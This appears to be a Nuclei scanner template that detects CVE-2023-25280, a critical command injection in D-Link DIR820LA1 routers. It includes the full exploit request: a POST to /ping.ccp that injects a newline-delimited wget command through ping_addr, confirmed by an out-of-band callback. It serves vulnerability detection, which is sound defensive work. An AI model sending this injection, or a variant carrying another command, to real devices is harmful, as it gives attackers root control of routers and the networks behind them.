id: CVE-2023-25280

info:
  name: D-Link DIR820LA1_FW105B03 'ping_addr' - OS Command Injection
  author: pussycat0x
  severity: critical
  description: |
    OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands with root privileges on the D-Link DIR820LA1 router, leading to complete device compromise and network takeover.
  remediation: |
    Upgrade to the latest firmware version from D-Link or replace the affected device with a patched model.
  reference:
    - https://github.com/migraine-sudo/D_Link_Vuln/tree/main/cmd%20Inject%20in%20pingV4Msg
    - https://www.dlink.com/en/security-bulletin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-25280
    cwe-id: CWE-78
    epss-score: 0.98053
    epss-percentile: 0.99904
    cpe: cpe:2.3:o:dlink:dir820la1_firmware:105b03:*:*:*:*:*:*:*
  metadata:
    vendor: dlink
    product: dir820la1_firmware
  tags: cve,cve2023,rce,unauth,kev,dlink,vkev,vuln

variables:
  payload: "wget http://{{interactsh-url}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'D-LINK')"
        condition: and
        internal: true

  - raw:
      - |
        POST /ping.ccp HTTP/1.1
        Host: {{Hostname}}
        Accept: application/xml, text/xml, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}
        Referer: {{RootURL}}/lan.asp
        Cookie: hasLogin=1

        ccp_act=pingV4Msg&ping_addr=%0a{{payload}}%0a

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http')"
          - "status_code == 200"
        condition: and
# digest: 490a0046304402203e6e33972ec4d7a8f8b4260c92b1aceac9c1b88b409405f9e52106f9dbfc2f8d02205ef33900a67d7b6e7a6f55db386597de7c6cd30cf8094bcafcbb4211a408de1e:922c64590222798bb761d5b6d8e72950